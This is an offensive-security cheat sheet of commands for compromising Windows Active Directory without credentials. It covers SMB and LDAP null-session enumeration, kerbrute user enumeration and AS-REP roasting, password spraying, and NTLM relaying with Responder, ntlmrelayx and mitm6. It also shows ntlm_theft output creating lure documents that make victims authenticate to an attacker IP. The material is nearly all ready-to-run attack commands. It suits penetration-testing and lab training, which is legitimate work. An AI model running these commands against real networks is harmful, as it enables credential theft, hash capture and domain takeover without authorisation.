#############
Without Creds
#############

| First enumeration 

.. code-block:: bash

    # Basic infos
    nxc smb RHOST --pass-pol --users

    # List SMB shares (You need to try all of them)
    nxc smb RHOST --shares --rid-brute
    nxc smb RHOST -u '' -p '' --shares --rid-brute # Null Session
    nxc smb RHOST -u 'a' -p '' --shares --rid-brute
    smbclient -N -L \\\\RHOST # Null Session

    # Other protocols 
    nxc rdp RHOST
    nxc winrm RHOST
    nxc ldap RHOST
    nxc wmi RHOST
    nxc mssql RHOST

    enum4linux RHOST
    rpcdump.py RHOST | grep Provider | sort -u

|

****************
Active Directory
****************

| Dump ldap infos with a null session

.. code-block:: bash

  ldapsearch -H ldap://domain.com -x -s base '' "(objectClass=*)" "*" + | tee /tmp/ldapsearchtop
  ldapsearch -H ldap://domain.com -x -b dc=domain,dc=com | tee /tmp/ldapsearchcontent

|

| If you have kerberos port open on a DC, you can try to list users

.. code-block:: bash

    kerbrute userenum --dc 1.2.3.4 --domain domain.com /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt

| Then try to AS-REP if you found users

.. code-block:: bash

    GetNPUsers.py -debug 'domain.com/' -usersfile /tmp/users -outputfile /tmp/hashes.asreproast -format hashcat -dc-ip 1.2.3.4

|

**************
Password Spray
**************

| https://mayfly277.github.io/posts/GOADv2-pwning-part2/
| https://github.com/Hackndo/sprayhound

.. code-block:: bash

    # classic user=password test
    nxc smb RHOST -u users.txt -p users.txt --no-bruteforce --continue-on-success
    sprayhound -U users.txt -d north.sevenkingdoms.local -dc RHOST --lower

    # When providing a valid domain account, sprayhound will try and find default domain policy and check badpwdcount attribute of each user against lockout threshold. If too close, it will skip these accounts.
    sprayhound -U users.txt -d north.sevenkingdoms.local -dc RHOST -lu validuser -lp validpass --lower -t 2

|

*************
NetNTLM Relay
*************

| https://beta.hackndo.com/ntlm-relay/
| https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

| Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification
| ntlmrelayx will relay NetNTLMv2 auth to targets (By default, ntlmrelayx.py upon a successful relay will dump the SAM database of the target.)
| possible targets are servers without SMB signature, nxc 

.. code-block:: bash

    nxc smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
    ntlmrelayx.py -smb2support --no-http-server -ip LHOST -w -tf /tmp/targets.txt -of /tmp/netntlm
    sudo python3 /opt/Responder/Responder.py -I tun0 -w

| 

| You can try to force NTLM authentification 
| https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse
| https://github.com/p0dalirius/Coercer
|

DHCP6
*****

| mitm6 + ntlmrelayx

.. code-block:: bash

    mitm6 -i tun0 -d domain.com --debug
    ntlmrelayx.py -6 -wh wpadfakeserver.domain.com -t ldaps://dc.domain.com --add-computer relayedpccreate --delegate-access

|


ntlm_theft
**********

| "A tool for generating multiple types of NTLMv2 hash theft files"
| For example putting a scf file on a share can lead users to initiate an SMB communication to your server without user interaction. (It doesn't seems to work on recent windows)
| https://github.com/Greenwolf/ntlm_theft
| https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication

.. code-block:: bash

  mkdir /tmp/NTLM
  python3 /opt/ntlm_theft/ntlm_theft.py -g all -s 10.10.14.139 -f /tmp/NTLM/ntlm
  Created: /tmp/NTLM/ntlm.scf (BROWSE TO FOLDER)
  Created: /tmp/NTLM/ntlm-(url).url (BROWSE TO FOLDER)
  Created: /tmp/NTLM/ntlm-(icon).url (BROWSE TO FOLDER)
  Created: /tmp/NTLM/ntlm.lnk (BROWSE TO FOLDER)
  Created: /tmp/NTLM/ntlm.rtf (OPEN)
  Created: /tmp/NTLM/ntlm-(stylesheet).xml (OPEN)
  Created: /tmp/NTLM/ntlm-(fulldocx).xml (OPEN)
  Created: /tmp/NTLM/ntlm.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
  Created: /tmp/NTLM/ntlm-(includepicture).docx (OPEN)
  Created: /tmp/NTLM/ntlm-(remotetemplate).docx (OPEN)
  Created: /tmp/NTLM/ntlm-(frameset).docx (OPEN)
  Created: /tmp/NTLM/ntlm-(externalcell).xlsx (OPEN)
  Created: /tmp/NTLM/ntlm.wax (OPEN)
  Created: /tmp/NTLM/ntlm.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
  Created: /tmp/NTLM/ntlm.asx (OPEN)
  Created: /tmp/NTLM/ntlm.jnlp (OPEN)
  Created: /tmp/NTLM/ntlm.application (DOWNLOAD AND OPEN)
  Created: /tmp/NTLM/ntlm.pdf (OPEN AND ALLOW)
  Created: /tmp/NTLM/ntlm/zoom-attack-instructions.txt (PASTE TO CHAT)
  Created: /tmp/NTLM/ntlm/Autorun.inf (BROWSE TO FOLDER)
  Created: /tmp/NTLM/ntlm/desktop.ini (BROWSE TO FOLDER)
  Generation Complete.

|
